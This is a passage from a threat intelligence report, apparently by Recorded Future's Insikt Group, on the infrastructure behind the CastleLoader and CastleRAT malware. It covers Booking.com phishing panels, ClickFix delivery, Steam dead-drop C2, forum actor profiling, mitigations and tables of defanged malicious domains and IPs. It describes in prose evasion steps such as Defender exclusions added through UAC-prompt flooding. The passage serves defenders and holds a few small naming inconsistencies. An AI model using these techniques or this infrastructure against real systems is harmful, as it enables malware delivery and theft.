        <p>The second website, <a href="https://urlscan.io/result/0199c9ff-89fc-7485-9c2c-d9124361dc00">hosted</a> on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits several notable configuration differences (see <strong>Figure 18</strong>). These include a distinct AWS username, an SMTP sender address, <em>bred[@]booking-porta[.]com</em>, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified <em>109[.]104[.]153[.]87</em> as its proxy server.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dd3b5b946434f96299c400d804be3d2845722bc0.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 18</strong>: Page linked to “Email Manager” tool (Source: Recorded Future)</em>
        </p>
        <h5>Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)</h5>
        <p>The third website, <a href="https://urlscan.io/result/0199c9ff-8cbc-7029-b6ab-dfcc24a26c96">hosted</a> on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see <strong>Figure 19</strong>). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: <code>[identifier].[base_name].[main_domain]</code>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a869a94ae293e8228df02d97b7bb9de354345613.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 19</strong>: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)</em>
        </p>
        <p>The domains <em>site-riko[.]com</em>, <em>site-sero[.]com</em>, <em>site-silo[.]com</em>, <em>site-tiko[.]com</em>, and <em>site-filo[.]com</em> are all referenced within the DOM.</p>
        <p>Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in <strong>Table 1</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>Ports</strong></div>
          </div>
          <div>
            <div>109[.]104[.]153[.]100</div>
            <div>11599, 12305, 13267, 13275</div>
          </div>
          <div>
            <div>109[.]104[.]153[.]193</div>
            <div>10324, 10616, 14195, 14196</div>
          </div>
          <div>
            <div>109[.]104[.]153[.]29</div>
            <div>13413, 14900</div>
          </div>
          <div>
            <div>109[.]104[.]154[.]67</div>
            <div>11264, 11860, 14100, 14122</div>
          </div>
        </div>
        <p><em><strong>Table 1</strong>: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)</em></p>
        <p>Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in <strong>Table 2</strong>. The domains hosted on these IP addresses are listed in <strong>Appendix H</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Notes</strong></div>
          </div>
          <div>
            <div>85[.]208[.]84[.]65</div>
            <div>STIMUL-AS, RU (AS211659)</div>
            <div>
              <ul>
                <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
                <li>CastleRAT and Matanbuchus C2 servers identified within the same /24 range (<em>85[.]208[.]84[.]115</em> and <em>85[.]208[.]84[.]242</em>, respectively)</li>
              </ul>
            </div>
          </div>
          <div>
            <div>80[.]64[.]18[.]245</div>
            <div>STIMUL-AS, RU (AS211659)</div>
            <div>
              <ul>
                <li>Hosts hotel-themed domains</li>
              </ul>
            </div>
          </div>
          <div>
            <div>185[.]39[.]19[.]94</div>
            <div>OPTIMA-AS, RU (AS216341)</div>
            <div>
              <ul>
                <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
              </ul>
            </div>
          </div>
          <div>
            <div>88[.]214[.]50[.]83</div>
            <div>OPTIMA-AS, RU (AS216341)</div>
            <div>
              <ul>
                <li>Suspected testing server due to the number of domains including the keywords “test” and “demo”</li>
              </ul>
            </div>
          </div>
        </div>
        <p><em><strong>Table 2</strong>: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)</em></p>
        <h5>ASN Cluster Possibly Linked to Bearhost</h5>
        <p>Insikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers <a href="https://decodecybercrime.com/bearhost-bulletproof-hosting-network-same-playbook-new-fronts/">maintain</a> strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.</p>
        <h5>Infrastructure Similarities with TAG-157 (RefBroker)</h5>
        <p>Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address <em>77[.]83[.]207[.]56</em>, adjacent to <em>77[.]83[.]207[.]55</em>, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section <strong>ASN Cluster Possibly Linked to Bearhost</strong>. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.</p>
        <h4>Cluster 3: Booking.com Impersonation Activity</h4>
        <p>Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group noted a CastleRAT <a href="https://tria.ge/250818-vhng4awks9/behavioral2">sample</a> that leveraged a Booking.com phishing domain, <em>update-info4468765[.]com</em> (see <strong>Figure 20</strong>)<em>.</em> The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from <em>boiksal[.]com/upd</em>. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (<code>update.exe</code>) using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, <em>programsbookss[.]com</em>, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see <strong>Figure 21</strong>). CastleRAT samples that use Steam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in <strong>Appendix F.</strong></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11fc64af5fa19c4f74249b006eab3899fe29a0281.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1493" />
        </p>
        <p><em><strong>Figure 20</strong>: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)</em></p>
        <p>At the time of analysis, <em>update-info4468765[.]com</em> and <em>boiksal[.]com</em> were both hosted on <em>178[.]17[.]57[.]103</em>, while the Steam-resolved C2 domain, <em>programsbookss[.]com</em>, was hosted on an adjacent IP, <em>178[.]17[.]57[.]102</em>. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the <em>192[.]109[.]138[.]0/24</em> range, where Booking.com-themed phishing domains were hosted on <em>192[.]109[.]138[.]103</em> and the Steam-resolved C2 domains, <em>programsbookss[.]com</em> and <em>justnewdmain[.]com</em>, were hosted on <em>192[.]109[.]138[.]102</em>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1b8336b05390165b9d107f8417922fed7d97dacc5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1015" />
        </p>
        <p><em><strong>Figure 21</strong>: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)</em></p>
        <p>When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (<a href="https://pro.urlscan.io/result/0198f318-4860-7256-9c58-74307bfe89d0">1</a>, <a href="https://pro.urlscan.io/result/0198e28c-2350-7217-ad05-ebd6694c5fc2">2</a>). Further pivoting from the domain <em>boiksal[.]com</em> uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in <strong>Appendix G</strong>. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.</p>
        <h4>Cluster 4: Malvertising and Fake Software</h4>
        <p>Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.</p>
        <p>Based on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including <em>wereatwar[.]com</em>. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as <em>37[.]230[.]62[.]235</em> and <em>84[.]200[.]81[.]32</em>. Notably, the domain <em>jshanoi[.]com</em> resolved to these NetSupport-associated IP addresses during the period of activity.</p>
        <p>The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those <a href="https://x.com/g0njxa/status/1980943290896630209/photo/3">observed</a> in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.</p>
        <h3>Possible Connection to Exploit Forum User Sparja</h3>
        <p>Analysis of <a href="https://tria.ge/250520-yvkthsbr2s">historical</a> CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on <em>94[.]159[.]113[.]123</em> and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address <em>94[.]159[.]113[.]32</em> (see <strong>Figure 22</strong>)<em>.</em></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1694a57896b2a72600c74c531634a7f93ce34875f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_158f591d974d66fb741ee6789a74a8c861cd0c09f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p><em><strong>Figure 22:</strong></em> <em>Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)</em></p>
        <p>Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.</p>
        <p>On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see <strong>Figure 23</strong>). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader functionality consistent with CastleLoader’s purpose.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c30437beb16bf10e993ab55c126b207e27dcf839.png?width=750&amp;format=png&amp;optimize=medium" width="767" height="529" />
        </p>
        <p><em><strong>Figure 23:</strong></em> <em>Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)</em></p>
        <p>Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see <strong>Figure 24</strong>). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_19420a3499ba40af372c0899cb96c5e2a7642dac2.png?width=750&amp;format=png&amp;optimize=medium" width="983" height="367" /><em><strong>Figure 24:</strong></em> <em>Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)</em>
        </p>
        <p>A <a href="https://tria.ge/250520-yvkthsbr2s/behavioral1">related</a> CastleLoader sample, distributed as an MSI installer, was <a href="https://bazaar.abuse.ch/sample/8f3fc820def7b492876b38d021c904aafc60c379e8ad58cac81eee05bf41ee77/">identified</a> in Bazaar Abuse data as originating from the GitHub account <em>github[.]com/legend123451111</em>. The same account appears in a Cisco Talos <a href="https://blog.talosintelligence.com/maas-operation-using-emmenhtal-and-amadey-linked-to-threats-against-ukrainian-entities/">report</a> describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.</p>
        <p>The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from <em>github[.]com/legend1234561111</em>, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.</p>
        <p>On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor <a href="https://www.cyberdaily.au/security/11791-black-basta-ransomware-leader-slips-away-from-courtroom">reportedly</a> identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for <a href="https://x.com/PRODAFT/status/1892636346885235092">distributing</a> Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.</p>
        <p>While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.</p>
        <h3>Victimology</h3>
        <p>Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that of the entities Insikt Group identified, the infection might have occurred on individual machines within the network of the victim organization or by using the victim’s WiFi rather than on the organization's network directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix H</strong> to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage Sigma, YARA, and Snort rules provided in <strong>Appendices I</strong>, <strong>J</strong>, <strong>K</strong>, <strong>L</strong>, <strong>M</strong>, <strong>N</strong>, and <strong>O</strong> in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.</li>
          <li>Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.</li>
        </ul>
        <h2>Outlook</h2>
        <p>As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.</p>
        <p>Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.</p>
        <p>Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: CastleLoader C2 Servers</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
          </div>
          <div>
            <div>icantseeyou[.]icu</div>
            <div>80[.]77[.]25[.]239</div>
            <div>2025-10-09</div>
          </div>
          <div>
            <div>anotherproject[.]icu</div>
            <div>45[.]11[.]183[.]165</div>
            <div>2025-10-09</div>
          </div>
          <div>
            <div>donttouchthisisuseless[.]icu</div>
            <div>80[.]77[.]25[.]88</div>
            <div>2025-10-09</div>
          </div>
          <div>
            <div>oldspicenotsogood[.]shop</div>
            <div>45[.]155[.]249[.]121</div>
            <div>2025-09-22</div>
          </div>
          <div>
            <div>doyoureallyseeme[.]icu</div>
            <div>45[.]11[.]183[.]19</div>
            <div>2025-10-31</div>
          </div>
          <div>
            <div>touchmeplease[.]icu</div>
            <div>45[.]11[.]183[.]45</div>
            <div>2025-10-31</div>
          </div>
          <div>
            <div>donttouchme[.]life</div>
            <div>80[.]77[.]25[.]114</div>
            <div>2025-10-31</div>
          </div>
          <div>
            <div>wereatwar[.]com</div>
            <div>172[.]86[.]90[.]58</div>
            <div>2025-11-05</div>
          </div>
          <div>
            <div>rcpeformse[.]com</div>
            <div>147[.]45[.]177[.]127</div>
            <div>2025-11-05</div>
          </div>
          <div>
            <div>roject0[.]com</div>
            <div>185[.]121[.]234[.]141</div>
            <div>2025-11-03</div>
          </div>
          <div>
            <div>bethschwier[.]com</div>
            <div>170[.]130[.]165[.]201</div>
            <div>2025-10-12</div>
          </div>
          <div>
            <div>speatly[.]com</div>
            <div>173[.]44[.]141[.]52</div>
            <div>2025-11-06</div>
          </div>
          <div>
            <div>campanyasoft[.]com</div>
            <div>31[.]58[.]87[.]132</div>
            <div>2025-10-02</div>
          </div>
          <div>
            <div>alafair[.]net</div>
            <div>107[.]158[.]128[.]26</div>
            <div>2025-09-06</div>
          </div>
          <div>
            <div>dpeformse[.]com</div>
            <div>147[.]45[.]177[.]127</div>
            <div>2025-10-29</div>
          </div>
          <div>
            <div>castlppwnd[.]com</div>
            <div>31[.]58[.]50[.]160</div>
            <div>2025-11-05</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix B: Additional Infrastructure Likely Linked to CastleLoader</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
          </div>
          <div>
            <div>albafood[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>albalk[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>bdeskthebest[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>bestproxysale[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>bestvpninfo[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>chessinthenight[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>clgenetics[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>docusign[.]homes</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>dubaialbafood[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>easyadvicesforyou[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>easyprintscreen[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>funjobcollins[.]shop</div>
            <div>31[.]214[.]157[.]77</div>
          </div>
          <div>
            <div>nort-secure[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>norton-secure[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>notstablecoin[.]xyz</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>notusdt[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>nvidblog[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>nvldlainfoblog[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>oldspicenotsogood[.]shop</div>
            <div>45[.]155[.]249[.]121</div>
          </div>
          <div>
            <div>starkforeveryone[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>sweetdevices[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>testdomain123123[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradeviewdesktop[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradlngview-desktop[.]biz</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradlngvlewdesktop[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradview-desktop[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>vipcinemade[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>vipcinemadubai[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>vipdubaicinema[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix C: Logistics-Themed Infrastructure Used by TAG-160</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>loadsschedule[.]com</div>
            <div>199[.]79[.]62[.]141</div>
            <div>2025-08-04</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loadstracking[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-19</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loadstrucking[.]com</div>
            <div>162[.]251[.]80[.]108</div>
            <div>2025-05-18</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>rateconfirmations[.]com</div>
            <div>162[.]215[.]230[.]150</div>
            <div>2025-09-11</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>cdlfreightlogistics[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>dperforms[.]info</div>
            <div>78[.]153[.]155[.]131</div>
            <div>2025-10-01</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>englandloglstics[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>englanglogistlcs[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>loadstracking[.]com</div>
            <div>207[.]174[.]212[.]141</div>
            <div>2025-06-27</div>
            <div>N/A</div>
          </div>
          <div>
            <div>hometownlogisticsllc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>leemanlogisticsinc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>loadplannig[.]com</div>
            <div>204[.]11[.]58[.]80</div>
            <div>2025-07-27</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loads[.]icu</div>
            <div>185[.]236[.]20[.]154</div>
            <div>2025-09-17</div>
            <div>2025-11-10</div>
          </div>
          <div>
            <div>loadsplanning[.]com</div>
            <div>192[.]124[.]178[.]74</div>
            <div>2025-07-26</div>
            <div>2025-07-26</div>
          </div>
          <div>
            <div>loadsschedule[.]com</div>
            <div>199[.]79[.]62[.]141</div>
            <div>2025-08-04</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loadstracking[.]com</div>
            <div>207[.]174[.]212[.]141</div>
            <div>2025-06-28</div>
            <div>2025-07-03</div>
          </div>
          <div>
            <div>loadstrucking[.]com</div>
            <div>162[.]251[.]80[.]108</div>
            <div>2025-05-18</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>mcentireinc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>mcloads[.]com</div>
            <div>74[.]119[.]239[.]234</div>
            <div>2025-04-18</div>
            <div>2025-05-15</div>
          </div>
          <div>
            <div>mlxfreightinc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>mrlogsol[.]ca</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>pinaccletruckllc[.]com</div>
            <div>74[.]119[.]239[.]234</div>
            <div>2025-04-12</div>
            <div>2025-05-14</div>
          </div>
          <div>
            <div>rateconfirmations[.]com</div>
            <div>162[.]215[.]230[.]150</div>
            <div>2025-09-11</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>redlightninglogistics[.]com</div>
            <div>Cloudflare</div>
            <div>2025-03-21</div>
            <div>2025-11-10</div>
          </div>
          <div>
            <div>redlightninglogisticsinc[.]com</div>
            <div>74[.]119[.]239[.]234</div>
            <div>2025-04-19</div>
            <div>2025-05-13</div>
          </div>
          <div>
            <div>starshiplogisticsgroupllc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>tenderloads[.]com</div>
            <div>162[.]215[.]241[.]215</div>
            <div>2025-10-24</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>162[.]215[.]241[.]46</div>
            <div>2025-09-11</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>trucksscheduling[.]com</div>
            <div>162[.]215[.]230[.]96</div>
            <div>2025-08-18</div>
            <div>2025-11-10</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix D: Booking.com-Themed Domains Linked to TAG-161</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>checkinastayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>checkinistayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-17</div>
          </div>
          <div>
            <div>checkinstayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>checkistayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>checksstayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>checkystayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>confirmahotelastay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>confirmahotelstay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>confirmhotelestay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
